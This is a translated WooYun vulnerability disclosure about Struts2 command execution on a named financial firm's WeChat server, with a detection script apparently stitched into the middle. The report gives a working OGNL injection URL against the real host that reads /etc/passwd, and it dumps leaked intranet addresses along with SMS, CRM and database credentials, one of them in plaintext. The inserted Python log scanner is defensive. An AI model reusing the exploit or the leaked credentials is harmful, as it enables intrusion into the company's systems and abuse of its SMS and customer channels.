
Vulnerability summary

Defect ID: wooyun-2015-0111745

Title: Command execution at a financial services group (intranet penetration possible; SMS can be sent through the SMS interface; WeChat can be hijacked)

Related vendor: 利得财富

Author: 英雄

Submitted: 2015-05-04 10:36

Fix time: 2015-06-18 10:38

Disclosed: 2015-06-18 10:38

Vulnerability type: command execution

Severity: high

Self-assessed Rank: 15

Status: vendor not reached, or vendor actively ignored

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-06-18: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Command execution at a financial services group (intranet penetration possible; SMS can be sent through the SMS interface; WeChat can be hijacked)

Detailed description:

Struts2 command execution at a financial services group (intranet penetration possible; SMS can be sent through the SMS interface; WeChat can be hijacked)

Proof of vulnerability:

http://wechat.leadbank.com.cn/loginAction.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}


ws_client_url=http://10.1.1.247:8088/ld_gateway/services/SmsService
ws_client_username=duKAkFMoHco.
ws_client_password=6TjUEhoBSQKehpqH8dpdQA..
#marketing SMS
ws_client_marketing_url=http://10.1.1.247:8088/ld_gateway/services/SmsService
ws_client_marketing_username=fVe5Ku0KK9I.
ws_client_marketing_password=McefExADbZflnVElaHjwrw..
#crm ws url
crm_ws_url=http\://10.1.1.224\:8080/imart/services/WechatService?wsdl
crm_ws_namespace=http\://wechat.webservice.crm.leadbank.com.cn
crm_ws_username=ld_wechat
crm_ws_password=Ld_WeChAt


#local jdbc 
#########################################################################
#------------oracle--------------------------
jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
#for test surroundings LD_WECHART/LD_WECHART
#jdbc.url=jdbc:oracle:thin:@10.1.1.249:1521:ORCL
#jdbc.username=H3hRomSK8bR_zMG_VVhY7Q..
#jdbc.password=H3hRomSK8bR_zMG_VVhY7Q..
#for official surroundings LD_WECHAT/LD_WECHAT0923
jdbc.url=jdbc:oracle:thin:@10.1.1.97:1521:ORCL
jdbc.username=H3hRomSK8bSc3B93RFMddw..
#jdbc.password=H3hRomSK8bT0W4spzVOUfw..
jdbc.password=v__vHAmJze07AwHSXpV5EA..
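The proof-of-concept URL above has a recognisable shape: a query parameter whose name begins with the Struts2 `redirect:` prefix, followed by an OGNL expression that spawns a process and writes its output into the HTTP response. The following detection routine, added here as an example and not part of the original report or the vendor's systems, parses combined-format web-server access logs, percent-decodes each request URI (twice, so double-encoded payloads are normalised) and flags requests carrying that pattern or the Java class and OGNL names it relies on. The log lines, IP addresses and indicator names are constructed for the example.

```python
"""Scan access logs for Struts2 'redirect:${...}' OGNL injection attempts.
Added example; the sample log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (hypothetical client IPs).
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2015:10:36:01 +0800] "GET /loginAction.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27id%27})).start()} HTTP/1.1" 200 512
10.0.0.8 - - [04/May/2015:10:36:02 +0800] "GET /loginAction.action?username=alice&redirect=/home HTTP/1.1" 302 0
10.0.0.7 - - [04/May/2015:10:36:03 +0800] "GET /loginAction.action?redirect:%2524%257B%2523context%257D HTTP/1.1" 500 0
10.0.0.9 - - [04/May/2015:10:36:04 +0800] "GET /static/app.js HTTP/1.1" 200 10240
"""

# Groups: client ip, timestamp, method, request-uri, protocol, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3})')

# Struts2 interprets a parameter whose *name* starts with redirect: or
# redirectAction: as a result override; an OGNL opener immediately after the
# prefix is the injection shape shown in the report's proof-of-concept URL.
REDIRECT_OGNL_RE = re.compile(r'[?&](?:redirect|redirectAction):\s*[$%]\{')

# Substrings that have no business in a legitimate query string.
SUBSTRING_INDICATORS = {
    "process-spawn": ("java.lang.ProcessBuilder", "java.lang.Runtime"),
    "ognl-context-access": ("#context",),
    "response-writer": ("getWriter()",),
}


def decode_uri(uri: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def ognl_indicators(request_uri: str) -> list:
    """Return the indicator names matched by one request URI (empty if clean)."""
    decoded = decode_uri(request_uri)
    found = []
    if REDIRECT_OGNL_RE.search(decoded):
        found.append("redirect-prefix-ognl")
    for name, needles in SUBSTRING_INDICATORS.items():
        if any(needle in decoded for needle in needles):
            found.append(name)
    return found


def scan_access_log(text: str) -> list:
    """Parse combined-format lines and return dicts for the suspicious ones."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line; a real pipeline would count these
        ip, ts, method, uri, _proto, status = match.groups()
        indicators = ognl_indicators(uri)
        if indicators:
            hits.append({"ip": ip, "time": ts, "method": method,
                         "status": int(status), "uri": uri,
                         "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], ",".join(hit["indicators"]))
```

The benign `redirect=/home` parameter in the second sample line is not flagged because the rule keys on the `redirect:` prefix followed by an OGNL opener, not on the word "redirect" alone; the third line shows that a double-encoded payload is still caught after normalisation. A 200 or 500 status on a flagged request is worth triaging first, since both indicate the expression reached the OGNL evaluator rather than being rejected at the edge.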

Remediation:

The engineers will know!

Copyright notice: please credit the source when reposting: 英雄@乌云


Vulnerability response

Vendor's reply:

Could not reach the vendor, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)